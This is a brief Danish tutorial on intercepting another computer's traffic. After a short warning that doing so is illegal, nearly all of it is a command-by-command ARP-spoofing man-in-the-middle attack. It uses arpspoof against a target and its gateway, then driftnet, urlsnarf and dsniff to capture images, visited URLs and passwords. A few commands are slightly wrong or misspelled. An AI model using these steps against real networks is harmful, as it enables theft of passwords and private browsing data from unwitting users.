Med dsniff kan du se/sniffe andre computers netværkstrafik.
Jeg vil først advare om dette. Du må aldrig sniffe på andres netværk. man straffes for forsøg på indtrængen. Ifølge straffelovens §21 omfatter “forsøg” også forberedelser til en forbrydelse. Så lad vær med det.
Så lad os komme igang.
For at bruge funktionen skal du bruge nogle programmer. Så vi starter med at installere dsniff.
$ sudo apt install dsniff
Start med at åbne en bash shell
check af ip forward er aktiv med
$ cat /proc/sys/net/ipv4/ip_forward
Skal give 1. Hvis den ikke gør sættes det med med en echo som vist her.
$ sudo echo 1 >> /proc/sys/net/ipv4/ip_forward
Der efter. start screen som root.
tryk ctrl + a derefter pipe tegnet | dette vil lave screen split
derefter crtl + a + stort S for split igen.
i første terminal start
Den xxx.xxx.xxx.xxx Er ip som den host du vil lave sniffing på.
yyy.yyy.yyy.yyy er den host du vil sniffe på’s gateway
$ sudo arpspoof -i eth0 -t xxx.xxx.xxx.xxx yyy.yyy.yyy.yyy
Skift terminal med ctrl + a + tab
Og ctrl + a
og ctrl + a + c for ny terminal
Og i næste terminal.
$ sudo arpspoof -i eth0 -t yyy.yyy.yyy.yyy (sniff host's gateway) xxx.xxx.xxx.xxx (den host du vil sniffe på)
Og ctrl + a for ny tab
og ctrl + c for ny terminal
$ sudo drifnet -i eth0
drifnet er for snifff af billedere fra browser.
$ urlsnarf -i eth0 for url sniffer
samt dsniff – password sniffer
$ dsniff -i eth0
For at slutte af med
$ killall arpspoof
